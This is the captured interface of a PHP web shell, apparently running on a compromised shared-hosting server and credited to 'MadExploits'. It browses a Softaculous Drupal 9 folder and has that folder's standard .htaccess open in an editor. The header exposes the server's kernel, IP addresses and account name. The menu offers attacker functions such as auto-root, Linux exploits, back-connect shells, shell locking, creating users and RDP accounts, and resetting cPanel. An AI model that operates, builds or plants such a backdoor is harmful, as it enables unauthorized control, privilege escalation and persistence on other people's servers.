Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.142.156.58
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
drupal9 /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
741
B
-rw-r--r--
NOTES.txt
1.62
KB
-rw-r--r--
README.txt
283
B
-rw-r--r--
_htaccess
542
B
-rw-r--r--
clone.php
14.32
KB
-rw-r--r--
edit.php
4.71
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
271
B
-rw-r--r--
import.php
5.45
KB
-rw-r--r--
info.xml
3.92
KB
-rw-r--r--
install.js
1.32
KB
-rw-r--r--
install.php
15.28
KB
-rw-r--r--
install.xml
1.1
KB
-rw-r--r--
md5
3.62
KB
-rw-r--r--
settings.php
33.91
KB
-rw-r--r--
upgrade.php
4.32
KB
-rw-r--r--
upgrade.xml
309
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# Deny all requests from Apache 2.4+. <IfModule mod_authz_core.c> Require all denied </IfModule> # Deny all requests from Apache 2.0-2.2. <IfModule !mod_authz_core.c> Deny from all </IfModule> # Turn off all options we don't need. Options -Indexes -ExecCGI -Includes -MultiViews # Set the catch-all handler to prevent scripts from being executed. SetHandler Drupal_Security_Do_Not_Remove_See_SA_2006_006 <Files *> # Override the handler again if we're run later in the evaluation list. SetHandler Drupal_Security_Do_Not_Remove_See_SA_2013_003 </Files> # If we know how to do it safely, disable the PHP engine entirely. <IfModule mod_php7.c> php_flag engine off </IfModule> <IfModule mod_php.c> php_flag engine off </IfModule>
Close